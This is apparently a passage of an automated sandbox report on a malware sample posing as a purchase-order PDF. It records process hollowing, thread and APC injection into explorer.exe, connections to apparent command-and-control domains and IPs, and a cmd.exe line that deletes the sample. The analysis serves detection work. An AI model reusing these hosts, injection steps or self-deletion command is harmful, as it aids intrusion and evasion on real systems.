          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03693884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.jual-penggugurkandungan.com
          Source: C:\Windows\explorer.exeDomain query: www.handybusy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.218.97 80
          Source: C:\Windows\explorer.exeDomain query: www.n1getaccess.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.shopvybz.com
          Source: C:\Windows\explorer.exeDomain query: www.comericac.com
          Source: C:\Windows\explorer.exeDomain query: www.discountpty.com
          Source: C:\Windows\explorer.exeDomain query: www.mybluemonitor.com
          Source: C:\Windows\explorer.exeDomain query: www.trucktodock.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.138.219 80
          Source: C:\Windows\explorer.exeDomain query: www.theassistedadrscheme.com
          Source: C:\Windows\explorer.exeDomain query: www.indiadesignstory.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 2F0000
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess created: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
          Source: explorer.exe, 00000003.00000000.268407308.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.257195689.0000000006860000.00000004.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.248116265.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.478096926.0000000005EA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
